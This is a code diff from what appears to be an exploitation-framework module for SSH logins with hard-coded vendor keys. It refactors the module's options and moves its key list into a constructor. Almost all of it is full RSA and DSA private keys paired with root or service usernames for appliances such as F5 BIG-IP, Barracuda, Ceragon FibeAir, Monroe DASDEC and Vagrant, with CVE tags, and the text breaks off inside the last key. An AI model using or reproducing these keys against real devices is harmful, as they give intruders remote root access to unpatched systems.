+ "Digital Alert Systems DASDEC and Monroe Electronics One-Net E189 Emergency Alert System", + "Vagrant", ], } + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(22, "Target SSH port") - target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address) # target address - ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer) # target port - - private_keys = [ - { # ExaGrid firmware < 4.8 P26 - "user": "root", - "private_key": """ - -----BEGIN RSA PRIVATE KEY----- - MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10 - hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa - E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA - GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ - BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg - AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y - iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs - Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj - QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz - ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG - XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk - 86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y - x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg== - -----END RSA PRIVATE KEY----- - """ - }, - { # quantum dxi v1000 - "user": "root", - "private_key": """ - -----BEGIN DSA PRIVATE KEY----- - MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2 - hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t - Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2 - +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4 - 6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5 - PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr - E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK - 6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn - k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u - B3Upsx556K/iZPPnJZE= - -----END DSA PRIVATE KEY----- - """ - }, - { # array network vapv vxag - "user": "sync", - "private_key": """ - -----BEGIN DSA PRIVATE KEY----- - MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm - q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM - xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25 - Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr - gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq - mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K - O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ - OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb - +0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs - +sqSEhA35Le2kC4Y1/A= - -----END DSA PRIVATE KEY----- - """ - }, - { # barracuda load balancer vm - "user": "cluster", - "private_key": """ - -----BEGIN DSA PRIVATE KEY----- - MIIBuwIBAAKBgQDKuRHCBXXwoyWpMkJz/wQafaHOpqWmVYLn9GZ6eQuNLcIhtZQE - kCWZTNajgf4ZAVmHgQh1JHDixJ1V0mcweti/lvyxiqHap7IkD0a+ewAOoz3OpjQZ - 3ox2ovHEnQJfZ/9LNiEI3XK8TPAj6trhMn5tCdwFei6228a+TYBOccTPgwIVAKYW - T8ztHHaN7Gwn0I6keQfBSNw1AoGAHYNfKAcqf7Y4wyoVoZpr/h21SETpEaksQb7h - GRJnFpYN/JiyE9W8nX6UqLv1eKyOXLccAnyda0a+uqcOhsAq8+H15slZYa4+065L - ckPfs0V4cpxeMHTT1hK4TR2/LRpUjhYjgXFE5aLl91f5Gug5HemUK2S0BWh/oI38 - k2WfNh0CgYEArsJgp7RLPOsCeLqoia/eljseBFVDazO5Q0ysUotTw9wgXGGVWREw - m8wNggFNb9eCiBAAUfVZVfhVAtFT0pBf/eIVLPXyaMw3prBt7LqeBrbagODc3WAA - dMTPIdYYcOKgv+YvTXa51zG64v6pQOfS8WXgKCzDl44puXfYeDk5lVQCFAPfgalL - +FT93tofXMuNVfeQMLJl - -----END DSA PRIVATE KEY----- - """ - }, - { # ceragon fibeair cve-2015-0936 - "user": "mateidu", - "private_key": """ - -----BEGIN RSA PRIVATE KEY----- - MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr - MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+ - IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB - gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3 - CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv - 4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY - SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6 - B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV - 93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc - WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP - YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll - 7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT - uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg== - -----END RSA PRIVATE KEY----- - """ - }, - { # f5 bigip cve-2012-1493 - "user": "root", - "private_key": """ - -----BEGIN RSA PRIVATE KEY----- - MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh - UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk - OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB - gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF - 8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv - 7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM - 2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s - 37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL - RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4 - rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/ - uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU - Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G - LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS - -----END RSA PRIVATE KEY----- - """ - }, - { # loadbalancer.org enterprise va - "user": "root", - "private_key": """ - -----BEGIN DSA PRIVATE KEY----- - MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW - Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd - yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ - rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+ - t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW - cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY - TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1 - MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl - 2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH - SzmJVCWFyVuuANR2Bnc= - -----END DSA PRIVATE KEY----- - """ - }, - { # monroe dasdec cve-2013-0137 - "user": "root", - "private_key": """ - -----BEGIN DSA PRIVATE KEY----- - MIIBuwIBAAKBgQDdwCE68iTEMjimYwJMvpkP/KThyJbuKvKc5kdKqLSmi5tssnuW - tD2NqzmkEQM4uxD4XgV26k2/GvE6x4RlyOT+xlB2iYaOR4RJ8PuU8ALz+9i+y3D8 - MTMY/6y3Ef41frizLFXiVVo8CXFL/N8sz16FYytIayJvkSy3rkzPoE8pRwIVAPmA - F1excCJPPVq3MyDfEMUXXOWjAoGAJS8ukwjJTgTNCHD7Lz//WxIw49DPGGWs3are - GpjtiGjVD2Lff7CLCzkH8SI/JsgytUzqfDckSXqe1eWiAhuH90Pl5LZZi83Vp97I - 721riAF3taKYxtk+vWIcXx2a/Fp+z+LaQoMqjOLh5lCq35wc0EPb5FFFrGaFFzNm - e71F1X0CgYAU6eNlphQWDwx0KOBiiYhF9BM6kDbQlyw8333rAG3G4CcjI2G8eYGt - pBNliaD185UjCEsjPiudhGil/j4Zt/+VY3aGOLoi8kqXBBc8ZAML9bbkXpyhQhMg - wiywx3ciFmvSn2UAin8yurStYPQxtXauZN5PYbdwCHPS7ApIStdpMAIVAJ+eePIA - Azb0ux287wRfcfdbjlDM - -----END DSA PRIVATE KEY----- - """ - }, - { # vagrant - "user": "root", - "private_key": """ - -----BEGIN RSA PRIVATE KEY----- - MIIEogIBAAKCAQEA6NF8iallvQVp22WDkTkyrtvp9eWW6A8YVr+kz4TjGYe7gHzI - w+niNltGEFHzD8+v1I2YJ6oXevct1YeS0o9HZyN1Q9qgCgzUFtdOKLv6IedplqoP - kcmF0aYet2PkEDo3MlTBckFXPITAMzF8dJSIFo9D8HfdOV0IAdx4O7PtixWKn5y2 - hMNG0zQPyUecp4pzC6kivAIhyfHilFR61RGL+GPXQ2MWZWFYbAGjyiYJnAmCP3NO - Td0jMZEnDkbUvxhMmBYSdETk1rRgm+R4LOzFUGaHqHDLKLX+FIPKcF96hrucXzcW - yLbIbEgE98OHlnVYCzRdK8jlqm8tehUc9c9WhQIBIwKCAQEA4iqWPJXtzZA68mKd - ELs4jJsdyky+ewdZeNds5tjcnHU5zUYE25K+ffJED9qUWICcLZDc81TGWjHyAqD1 - Bw7XpgUwFgeUJwUlzQurAv+/ySnxiwuaGJfhFM1CaQHzfXphgVml+fZUvnJUTvzf - TK2Lg6EdbUE9TarUlBf/xPfuEhMSlIE5keb/Zz3/LUlRg8yDqz5w+QWVJ4utnKnK - iqwZN0mwpwU7YSyJhlT4YV1F3n4YjLswM5wJs2oqm0jssQu/BT0tyEXNDYBLEF4A - sClaWuSJ2kjq7KhrrYXzagqhnSei9ODYFShJu8UWVec3Ihb5ZXlzO6vdNQ1J9Xsf - 4m+2ywKBgQD6qFxx/Rv9CNN96l/4rb14HKirC2o/orApiHmHDsURs5rUKDx0f9iP - cXN7S1uePXuJRK/5hsubaOCx3Owd2u9gD6Oq0CsMkE4CUSiJcYrMANtx54cGH7Rk - EjFZxK8xAv1ldELEyxrFqkbE4BKd8QOt414qjvTGyAK+OLD3M2QdCQKBgQDtx8pN - CAxR7yhHbIWT1AH66+XWN8bXq7l3RO/ukeaci98JfkbkxURZhtxV/HHuvUhnPLdX - 3TwygPBYZFNo4pzVEhzWoTtnEtrFueKxyc3+LjZpuo+mBlQ6ORtfgkr9gBVphXZG - YEzkCD3lVdl8L4cw9BVpKrJCs1c5taGjDgdInQKBgHm/fVvv96bJxc9x1tffXAcj - 3OVdUN0UgXNCSaf/3A/phbeBQe9xS+3mpc4r6qvx+iy69mNBeNZ0xOitIjpjBo2+ - dBEjSBwLk5q5tJqHmy/jKMJL4n9ROlx93XS+njxgibTvU6Fp9w+NOFD/HvxB3Tcz - 6+jJF85D5BNAG3DBMKBjAoGBAOAxZvgsKN+JuENXsST7F89Tck2iTcQIT8g5rwWC - P9Vt74yboe2kDT531w8+egz7nAmRBKNM751U/95P9t88EDacDI/Z2OwnuFQHCPDF - llYOUI+SpLJ6/vURRbHSnnn8a/XG+nzedGH5JGqEJNQsz+xT2axM0/W/CRknmGaJ - kda/AoGANWrLCz708y7VYgAtW2Uf1DPOIYMdvo6fxIB5i9ZfISgcJ/bbCUkFrhoH - +vq/5CIWxCPp0f85R4qxxQ5ihxJ0YDQT9Jpx4TMss4PSavPaBH3RXow5Ohe+bYoQ - NE5OgEXk2wVfZczCZpigBKbKZHNYcelXtTt/nP3rsCuGcM4h53s= - -----END RSA PRIVATE KEY----- - """ - } - ] + def __init__(self): + self.private_keys = [ + { # ExaGrid firmware < 4.8 P26 + "user": "root", + "private_key": """ + -----BEGIN RSA PRIVATE KEY----- + MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10 + hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa + E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA + GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ + BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg + AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y + iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs + Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj + QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz + ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG + XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk + 86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y + x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg== + -----END RSA PRIVATE KEY----- + """ + }, + { # quantum dxi v1000 + "user": "root", + "private_key": """ + -----BEGIN DSA PRIVATE KEY----- + MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2 + hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t + Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2 + +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4 + 6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5 + PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr + E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK + 6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn + k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u + B3Upsx556K/iZPPnJZE= + -----END DSA PRIVATE KEY----- + """ + }, + { # array network vapv vxag + "user": "sync", + "private_key": """ + -----BEGIN DSA PRIVATE KEY----- + MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm + q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM + xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25 + Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr + gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq + mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K + O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ + OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb + +0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs + +sqSEhA35Le2kC4Y1/A= + -----END DSA PRIVATE KEY----- + """ + }, + { # barracuda load balancer vm + "user": "cluster", + "private_key": """ + -----BEGIN DSA PRIVATE KEY----- + MIIBuwIBAAKBgQDKuRHCBXXwoyWpMkJz/wQafaHOpqWmVYLn9GZ6eQuNLcIhtZQE + kCWZTNajgf4ZAVmHgQh1JHDixJ1V0mcweti/lvyxiqHap7IkD0a+ewAOoz3OpjQZ + 3ox2ovHEnQJfZ/9LNiEI3XK8TPAj6trhMn5tCdwFei6228a+TYBOccTPgwIVAKYW + T8ztHHaN7Gwn0I6keQfBSNw1AoGAHYNfKAcqf7Y4wyoVoZpr/h21SETpEaksQb7h + GRJnFpYN/JiyE9W8nX6UqLv1eKyOXLccAnyda0a+uqcOhsAq8+H15slZYa4+065L + ckPfs0V4cpxeMHTT1hK4TR2/LRpUjhYjgXFE5aLl91f5Gug5HemUK2S0BWh/oI38 + k2WfNh0CgYEArsJgp7RLPOsCeLqoia/eljseBFVDazO5Q0ysUotTw9wgXGGVWREw + m8wNggFNb9eCiBAAUfVZVfhVAtFT0pBf/eIVLPXyaMw3prBt7LqeBrbagODc3WAA + dMTPIdYYcOKgv+YvTXa51zG64v6pQOfS8WXgKCzDl44puXfYeDk5lVQCFAPfgalL + +FT93tofXMuNVfeQMLJl + -----END DSA PRIVATE KEY----- + """ + }, + { # ceragon fibeair cve-2015-0936 + "user": "mateidu", + "private_key": """ + -----BEGIN RSA PRIVATE KEY----- + MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr + MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+ + IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB + gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3 + CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv + 4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY + SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6 + B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV + 93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc + WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP + YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll + 7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT + uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg== + -----END RSA PRIVATE KEY----- + """ + }, + { # f5 bigip cve-2012-1493 + "user": "root", + "private_key": """ + -----BEGIN RSA PRIVATE KEY----- + MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh + UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk + OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB + gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF + 8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv + 7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM + 2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s + 37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL + RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4 + rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/ + uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU + Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G + LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS + -----END RSA PRIVATE KEY----- + """ + }, + { # loadbalancer.org enterprise va + "user": "root", + "private_key": """ + -----BEGIN DSA PRIVATE KEY----- + MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW + Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd + yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ + rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+ + t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW + cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY + TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1 + MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl + 2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH + SzmJVCWFyVuuANR2Bnc= + -----END DSA PRIVATE KEY----- + """ + }, + { # monroe dasdec cve-2013-0137 + "user": "root", + "private_key": """ + -----BEGIN DSA PRIVATE KEY----- + MIIBuwIBAAKBgQDdwCE68iTEMjimYwJMvpkP/KThyJbuKvKc5kdKqLSmi5tssnuW + tD2NqzmkEQM4uxD4XgV26k2/GvE6x4RlyOT+xlB2iYaOR4RJ8PuU8ALz+9i+y3D8 + MTMY/6y3Ef41frizLFXiVVo8CXFL/N8sz16FYytIayJvkSy3rkzPoE8pRwIVAPmA + F1excCJPPVq3MyDfEMUXXOWjAoGAJS8ukwjJTgTNCHD7Lz//WxIw49DPGGWs3are + GpjtiGjVD2Lff7CLCzkH8SI/JsgytUzqfDckSXqe1eWiAhuH90Pl5LZZi83Vp97I + 721riAF3taKYxtk+vWIcXx2a/Fp+z+LaQoMqjOLh5lCq35wc0EPb5FFFrGaFFzNm + e71F1X0CgYAU6eNlphQWDwx0KOBiiYhF9BM6kDbQlyw8333rAG3G4CcjI2G8eYGt + pBNliaD185UjCEsjPiudhGil/j4Zt/+VY3aGOLoi8kqXBBc8ZAML9bbkXpyhQhMg + wiywx3ciFmvSn2UAin8yurStYPQxtXauZN5PYbdwCHPS7ApIStdpMAIVAJ+eePIA + Azb0ux287wRfcfdbjlDM + -----END DSA PRIVATE KEY----- + """ + }, + { # vagrant + "user": "root", + "private_key": """ + -----BEGIN RSA PRIVATE KEY----- + MIIEogIBAAKCAQEA6NF8iallvQVp22WDkTkyrtvp9eWW6A8YVr+kz4TjGYe7gHzI + w+niNltGEFHzD8+v1I2YJ6oXevct1YeS0o9HZyN1Q9qgCgzUFtdOKLv6IedplqoP + kcmF0aYet2PkEDo3MlTBckFXPITAMzF8dJSIFo9D8HfdOV0IAdx4O7PtixWKn5y2 + hMNG0zQPyUecp4pzC6kivAIhyfHilFR61RGL+GPXQ2MWZWFYbAGjyiYJnAmCP3NO + Td0jMZEnDkbUvxhMmBYSdETk1rRgm+R4LOzFUGaHqHDLKLX+FIPKcF96hrucXzcW + yLbIbEgE98OHlnVYCzRdK8jlqm8tehUc9c9WhQIBIwKCAQEA4iqWPJXtzZA68mKd + ELs4jJsdyky+ewdZeNds5tjcnHU5zUYE25K+ffJED9qUWICcLZDc81TGWjHyAqD1 + Bw7XpgUwFgeUJwUlzQurAv+/ySnxiwuaGJfhFM1CaQHzfXphgVml+fZUvnJUTvzf + TK2Lg6EdbUE9TarUlBf/xPfuEhMSlIE5keb/Zz3/LUlRg8yDqz5w+QWVJ4utnKnK + iqwZN0mwpwU7YSyJhlT4YV1F3n4YjLswM5wJs2oqm0jssQu/BT0tyEXNDYBLEF4A + sClaWuSJ2kjq7KhrrYXzagqhnSei9ODYFShJu8UWVec3Ihb5ZXlzO6vdNQ1J9Xsf + 4m+2ywKBgQD6qFxx/Rv9CNN96l/4rb14HKirC2o/orApiHmHDsURs5rUKDx0f9iP + cXN7S1uePXuJRK/5hsubaOCx3Owd2u9gD6Oq0CsMkE4CUSiJcYrMANtx54cGH7Rk + EjFZxK8xAv1ldELEyxrFqkbE4BKd8QOt414qjvTGyAK+OLD3M2QdCQKBgQDtx8pN + CAxR7yhHbIWT1AH66+XWN8bXq7l3RO/ukeaci98JfkbkxURZhtxV/HHuvUhnPLdX + 3TwygPBYZFNo4pzVEhzWoTtnEtrFueKxyc3+LjZpuo+mBlQ6ORtfgkr9gBVphXZG + YEzkCD3lVdl8L4cw9BVpKrJCs1c5taGjDgdInQKBgHm/fVvv96bJxc9x1tffXAcj + 3OVdUN0UgXNCSaf/3A/phbeBQe9xS+3mpc4r6qvx+iy69mNBeNZ0xOitIjpjBo2+ + dBEjSBwLk5q5tJqHmy/jKMJL4n9ROlx93XS+njxgibTvU6Fp9w+NOFD/HvxB3Tcz + 6+jJF85D5BNAG3DBMKBjAoGBAOAxZvgsKN+JuENXsST7F89Tck2iTcQIT8g5rwWC + P9Vt74yboe2kDT531w8+egz7nAmRBKNM751U/95P9t88EDacDI/Z2OwnuFQHCPDF + 